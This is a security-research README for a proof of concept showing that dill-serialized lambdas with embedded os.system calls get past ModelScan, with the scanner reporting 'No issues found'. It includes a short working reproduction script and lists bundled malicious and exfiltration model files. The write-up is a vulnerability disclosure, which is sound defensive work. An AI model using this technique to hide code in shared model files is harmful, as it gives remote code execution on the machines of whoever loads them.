Upload README.md with huggingface_hub

acf13fe verified 25 days ago

1.53 kB

license: mit
tags:
  - security-research
  - modelscan-bypass

ModelScan Dill Bytecode Bypass PoC

Summary

Dill serializes lambdas/closures containing arbitrary code as compiled Python bytecode objects. ModelScan only checks pickle GLOBAL opcodes for dangerous module references, but dill embeds the actual dangerous calls (os.system, subprocess, etc.) inside raw bytecode that the scanner cannot analyze.

Vulnerability

Format: .dill (dill serialization)
Scanner: modelscan 0.7.6 / 0.8.8
Result: "No issues found"
Impact: Full RCE — any Python code can be embedded in a lambda/closure

Root Cause

Dill uses dill._dill._create_function and dill._dill._create_code to reconstruct functions from serialized bytecode. These modules are not in modelscan's blocklist. More critically, the ACTUAL dangerous code (os.system, subprocess.call, etc.) is embedded as compiled Python bytecode bytes, not as pickle GLOBAL references. ModelScan's approach of checking module names in pickle opcodes fundamentally cannot detect code hidden in bytecode objects.

Reproduction

import dill, os

# Create lambda with RCE
evil = lambda: os.system('echo PWNED')
dill.dump(evil, open('evil.dill', 'wb'))

# Scan — "No issues found"
# modelscan scan -p evil.dill

# Load — RCE
loaded = dill.load(open('evil.dill', 'rb'))
loaded()  # prints PWNED

Files

malicious_model.dill — Lambda calling os.system
exfiltration_model.dill — Lambda with data exfiltration payload